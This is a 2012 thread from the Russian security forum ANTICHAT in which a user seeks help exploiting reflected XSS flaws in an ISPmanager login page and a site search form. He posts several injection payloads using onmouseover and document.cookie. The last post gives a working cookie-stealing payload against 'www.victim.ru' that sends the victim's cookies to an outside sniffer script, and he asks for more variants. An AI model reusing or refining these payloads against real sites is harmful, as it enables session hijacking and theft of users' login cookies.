ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

14.08.2012, 13:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 345
Репутация:
0
|
|
мне кажется что у него уже времени на это много...
|
|
|
|

22.09.2012, 11:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 14654
Репутация:
-5
|
|
Я когда вставляю код в адресную строку, у меня оно срабатывает в поиске, но не как скрипт(( что делать?
|
|
|
|

22.09.2012, 15:29
|
|
Новичок
Регистрация: 24.09.2009
Сообщений: 14
Провел на форуме: 17836
Репутация:
0
|
|
второй раз вставляю пост если удаляете пишите пожалуйста почему? Имеется сайт,запрос вида: site/manager?alert(/x/); выкидывает меня на страницу вида https://site/manager/?alert(/x/);?alert(/x/); Там находится страница авторизации isp manager,НО запрос вида: site/manager/?'/
Код HTML:
HTML:
alert(/x/);
выдаёт пустую страницу,но код этой страницы таков:
Код HTML:
HTML:
location = 'https://site/manager/?'%3C/script%3E%3Cscript%3Ealert(/x/);?'%3C/script%3E%3Cscript%3Ealert(/x/);';
Насколько я понимаю, здесь соит фильтр ,который не даёт мне использовать символы ??? если мне удасться,обойти фильтрацию перекодировкой например,возможна ли здесь пассивная XSS???
...если копирую содержимое страницы на жёсткий, и там правлю, то понятное дело всё получается но как только ссылается на сайтик так лажа... что то я совсем запутался выручайте
|
|
|

24.09.2012, 03:42
|
|
Новичок
Регистрация: 24.09.2009
Сообщений: 14
Провел на форуме: 17836
Репутация:
0
|
|
xss
Вот другая ситуация есть уязвимость в форме поиска, можно испольщзовать onmouseover= и хтмл код, ява отказывается исполняться... ...У меня два вопроса, почему не хочет исполняться ява скрипт в форме или без неё и что кроме псевдо дефейса вообще возможно выжать из этого? может быть линк на тему где ИМЕННО ЭТИ вопросы обсуждены?..
Вот новая Ремарочка... ява работает в мозиле, однако отказывается в хроме и отключается в ишаке... мои два вопроса всё же актуальны,прошу подсказать
|
|
|

24.09.2012, 05:38
|
|
Новичок
Регистрация: 24.09.2009
Сообщений: 14
Провел на форуме: 17836
Репутация:
0
|
|
Вот простой для вас вопрос я думаю...
site/search/?q=" onmouseover=prompt(3333) />document.write(document.cookie);bad=
[/HTML]
|
|
|

24.09.2012, 09:55
|
|
Новичок
Регистрация: 24.09.2009
Сообщений: 14
Провел на форуме: 17836
Репутация:
0
|
|
нашёл решение для снифера, работает исключительно так:
[HTML]
HTML:
www.victim.ru/search/?q=" onmouseover=/>img=new Image ();img.src="http://sniff/sniff.php?cookie="%2Bdocument.cookiebad=(( может кто-нибудь подскажет ,другие варианты?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|